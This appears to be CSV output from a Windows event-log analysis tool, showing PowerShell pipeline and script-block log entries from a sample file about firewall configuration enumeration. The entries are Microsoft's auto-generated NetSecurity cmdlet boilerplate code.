Scriptblock Log," 1.0.0.0 NetIPsecPolicyChange ",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 16:23:06.067 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"#requires -version 3.0 if ($(Microsoft.PowerShell.Core\Get-Command Set-StrictMode -Module Microsoft.PowerShell.Core)) { Microsoft.PowerShell.Core\Set-StrictMode -Off } $script:MyModule = $MyInvocation.MyCommand.ScriptBlock.Module $script:ClassName = 'root/standardcimv2/MSFT_NetSecDeltaCollection' $script:ClassVersion = '1.0.0' $script:ModuleVersion = '1.0.0.0' $script:ObjectModelWrapper = 'Microsoft.PowerShell.Cmdletization.Cim.CimCmdletAdapter' $script:PrivateData = Microsoft.PowerShell.Utility\New-Object 'System.Collections.Generic.Dictionary[string,string]' Microsoft.PowerShell.Core\Export-ModuleMember -Function @() function __cmdletization_BindCommonParameters { param( $__cmdletization_objectModelWrapper, $myPSBoundParameters ) if ($myPSBoundParameters.ContainsKey('CimSession')) { $__cmdletization_objectModelWrapper.PSObject.Properties['CimSession'].Value = $myPSBoundParameters['CimSession'] } if ($myPSBoundParameters.ContainsKey('ThrottleLimit')) { $__cmdletization_objectModelWrapper.PSObject.Properties['ThrottleLimit'].Value = $myPSBoundParameters['ThrottleLimit'] } if ($myPSBoundParameters.ContainsKey('AsJob')) { $__cmdletization_objectModelWrapper.PSObject.Properties['AsJob'].Value = $myPSBoundParameters['AsJob'] } }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 16:23:06.067 
+09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"function __cmdletization_BindCommonParameters { param( $__cmdletization_objectModelWrapper, $myPSBoundParameters ) if ($myPSBoundParameters.ContainsKey('CimSession')) { $__cmdletization_objectModelWrapper.PSObject.Properties['CimSession'].Value = $myPSBoundParameters['CimSession'] } if ($myPSBoundParameters.ContainsKey('ThrottleLimit')) { $__cmdletization_objectModelWrapper.PSObject.Properties['ThrottleLimit'].Value = $myPSBoundParameters['ThrottleLimit'] } if ($myPSBoundParameters.ContainsKey('AsJob')) { $__cmdletization_objectModelWrapper.PSObject.Properties['AsJob'].Value = $myPSBoundParameters['AsJob'] } }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 16:23:06.067 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log," 1.0.0.0 NetIPsecDospSetting ",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 16:23:06.082 +09:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Get-Command): ""Get-Command"" ParameterBinding(Get-Command): name=""Module""; value=""Microsoft.PowerShell.Core"" ParameterBinding(Get-Command): name=""Name""; value=""Set-StrictMode""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 16:23:06.082 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock 
Log,"#requires -version 3.0 if ($(Microsoft.PowerShell.Core\Get-Command Set-StrictMode -Module Microsoft.PowerShell.Core)) { Microsoft.PowerShell.Core\Set-StrictMode -Off } $script:MyModule = $MyInvocation.MyCommand.ScriptBlock.Module $script:ClassName = 'root/standardcimv2/MSFT_NetIPsecDoSPSetting' $script:ClassVersion = '1.0.0' $script:ModuleVersion = '1.0.0.0' $script:ObjectModelWrapper = 'Microsoft.PowerShell.Cmdletization.Cim.CimCmdletAdapter' $script:PrivateData = Microsoft.PowerShell.Utility\New-Object 'System.Collections.Generic.Dictionary[string,string]' Microsoft.PowerShell.Core\Export-ModuleMember -Function @() function __cmdletization_BindCommonParameters { param( $__cmdletization_objectModelWrapper, $myPSBoundParameters ) if ($myPSBoundParameters.ContainsKey('CimSession')) { $__cmdletization_objectModelWrapper.PSObject.Properties['CimSession'].Value = $myPSBoundParameters['CimSession'] } if ($myPSBoundParameters.ContainsKey('ThrottleLimit')) { $__cmdletization_objectModelWrapper.PSObject.Properties['ThrottleLimit'].Value = $myPSBoundParameters['ThrottleLimit'] } if ($myPSBoundParameters.ContainsKey('AsJob')) { $__cmdletization_objectModelWrapper.PSObject.Properties['AsJob'].Value = $myPSBoundParameters['AsJob'] } } function New-NetIPsecDospSetting { [CmdletBinding(SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] param( [Parameter(ParameterSetName='cim:CreateInstance0', Mandatory=$true)] [string] ${Name}, [Parameter(ParameterSetName='cim:CreateInstance0')] [uint32] ${StateIdleTimeoutSeconds}, [Parameter(ParameterSetName='cim:CreateInstance0')] [uint32] ${PerIPRateLimitQueueIdleTimeoutSeconds}, [Parameter(ParameterSetName='cim:CreateInstance0')] [uint32] ${IpV6IPsecUnauthDscp}, [Parameter(ParameterSetName='cim:CreateInstance0')] [uint32] ${IpV6IPsecUnauthRateLimitBytesPerSec}, [Parameter(ParameterSetName='cim:CreateInstance0')] [uint32] ${IpV6IPsecUnauthPerIPRateLimitBytesPerSec}, 
[Parameter(ParameterSetName='cim:CreateInstance0')] [uint16] ${IpV6IPsecAuthDscp}, [Parameter(ParameterSetName='cim:CreateInstance0')] [uint32] ${IpV6IPsecAuthRateLimitBytesPerSec}, [Parameter(ParameterSetName='cim:CreateInstance0')] [uint16] ${IcmpV6Dscp}, [Parameter(ParameterSetName='cim:CreateInstance0')] [uint32] ${IcmpV6RateLimitBytesPerSec}, [Parameter(ParameterSetName='cim:CreateInstance0')] [uint32] ${IpV6FilterExemptDscp}, [Parameter(ParameterSetName='cim:CreateInstance0')] [uint32] ${IpV6FilterExemptRateLimitBytesPerSec}, [Parameter(ParameterSetName='cim:CreateInstance0')] [uint16] ${DefBlockExemptDscp}, [Parameter(ParameterSetName='cim:CreateInstance0')] [uint32] ${DefBlockExemptRateLimitBytesPerSec}, [Parameter(ParameterSetName='cim:CreateInstance0')] [uint32] ${MaxStateEntries}, [Parameter(ParameterSetName='cim:CreateInstance0')] [uint32] ${MaxPerIPRateLimitQueues}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.DospKeyModules] ${EnabledKeyingModules}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.DospFlags] ${FilteringFlags}, [Parameter(ParameterSetName='cim:CreateInstance0', Mandatory=$true)] [System.Management.Automation.WildcardPattern[]] ${PublicInterfaceAliases}, [Parameter(ParameterSetName='cim:CreateInstance0', Mandatory=$true)] [System.Management.Automation.WildcardPattern[]] ${PrivateInterfaceAliases}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${PublicV6Address}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${PrivateV6Address}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='cim:CreateInstance0')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='cim:CreateInstance0')] [switch] ${AsJob}) DynamicParam { try { if (-not 
$__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_methodParameters = Microsoft.PowerShell.Utility\New-Object 'System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]' [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Name')) { [object]$__cmdletization_value = ${Name} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null 
[object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('StateIdleTimeoutSeconds')) { [object]$__cmdletization_value = ${StateIdleTimeoutSeconds} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'StateIdleTimeoutSeconds'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'StateIdleTimeoutSeconds'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('PerIPRateLimitQueueIdleTimeoutSeconds')) { [object]$__cmdletization_value = ${PerIPRateLimitQueueIdleTimeoutSeconds} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'PerIPRateLimitQueueIdleTimeoutSeconds'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'PerIPRateLimitQueueIdleTimeoutSeconds'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('IpV6IPsecUnauthDscp')) { 
[object]$__cmdletization_value = ${IpV6IPsecUnauthDscp} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'IpV6IPsecUnauthDscp'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'IpV6IPsecUnauthDscp'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('IpV6IPsecUnauthRateLimitBytesPerSec')) { [object]$__cmdletization_value = ${IpV6IPsecUnauthRateLimitBytesPerSec} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'IpV6IPsecUnauthRateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'IpV6IPsecUnauthRateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('IpV6IPsecUnauthPerIPRateLimitBytesPerSec')) { [object]$__cmdletization_value = ${IpV6IPsecUnauthPerIPRateLimitBytesPerSec} $__cmdletization_methodParameter = 
Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'IpV6IPsecUnauthPerIPRateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'IpV6IPsecUnauthPerIPRateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('IpV6IPsecAuthDscp')) { [object]$__cmdletization_value = ${IpV6IPsecAuthDscp} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'IpV6IPsecAuthDscp'; ParameterType = 'System.UInt16'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'IpV6IPsecAuthDscp'; ParameterType = 'System.UInt16'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('IpV6IPsecAuthRateLimitBytesPerSec')) { [object]$__cmdletization_value = ${IpV6IPsecAuthRateLimitBytesPerSec} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'IpV6IPsecAuthRateLimitBytesPerSec'; 
ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'IpV6IPsecAuthRateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('IcmpV6Dscp')) { [object]$__cmdletization_value = ${IcmpV6Dscp} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'IcmpV6Dscp'; ParameterType = 'System.UInt16'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'IcmpV6Dscp'; ParameterType = 'System.UInt16'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('IcmpV6RateLimitBytesPerSec')) { [object]$__cmdletization_value = ${IcmpV6RateLimitBytesPerSec} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'IcmpV6RateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object 
Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'IcmpV6RateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('IpV6FilterExemptDscp')) { [object]$__cmdletization_value = ${IpV6FilterExemptDscp} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'IpV6FilterExemptDscp'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'IpV6FilterExemptDscp'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('IpV6FilterExemptRateLimitBytesPerSec')) { [object]$__cmdletization_value = ${IpV6FilterExemptRateLimitBytesPerSec} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'IpV6FilterExemptRateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'IpV6FilterExemptRateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 
'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('DefBlockExemptDscp')) { [object]$__cmdletization_value = ${DefBlockExemptDscp} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'DefBlockExemptDscp'; ParameterType = 'System.UInt16'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else {",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 16:23:06.082 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"$__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'DefBlockExemptDscp'; ParameterType = 'System.UInt16'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('DefBlockExemptRateLimitBytesPerSec')) { [object]$__cmdletization_value = ${DefBlockExemptRateLimitBytesPerSec} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'DefBlockExemptRateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { 
$__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'DefBlockExemptRateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('MaxStateEntries')) { [object]$__cmdletization_value = ${MaxStateEntries} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'MaxStateEntries'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'MaxStateEntries'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('MaxPerIPRateLimitQueues')) { [object]$__cmdletization_value = ${MaxPerIPRateLimitQueues} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'MaxPerIPRateLimitQueues'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'MaxPerIPRateLimitQueues'; ParameterType = 'System.UInt32'; 
Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('EnabledKeyingModules')) { [object]$__cmdletization_value = ${EnabledKeyingModules} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'EnabledKeyingModules'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.DospKeyModules'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'EnabledKeyingModules'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.DospKeyModules'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('FilteringFlags')) { [object]$__cmdletization_value = ${FilteringFlags} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'FilteringFlags'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.DospFlags'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'FilteringFlags'; ParameterType = 
'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.DospFlags'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('PublicInterfaceAliases')) { [object]$__cmdletization_value = ${PublicInterfaceAliases} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'PublicInterfaceAliases'; ParameterType = 'System.Management.Automation.WildcardPattern[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'PublicInterfaceAliases'; ParameterType = 'System.Management.Automation.WildcardPattern[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('PrivateInterfaceAliases')) { [object]$__cmdletization_value = ${PrivateInterfaceAliases} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'PrivateInterfaceAliases'; ParameterType = 'System.Management.Automation.WildcardPattern[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'PrivateInterfaceAliases'; ParameterType = 
'System.Management.Automation.WildcardPattern[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('PublicV6Address')) { [object]$__cmdletization_value = ${PublicV6Address} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'PublicV6Address'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'PublicV6Address'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('PrivateV6Address')) { [object]$__cmdletization_value = ${PrivateV6Address} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'PrivateV6Address'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'PrivateV6Address'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) 
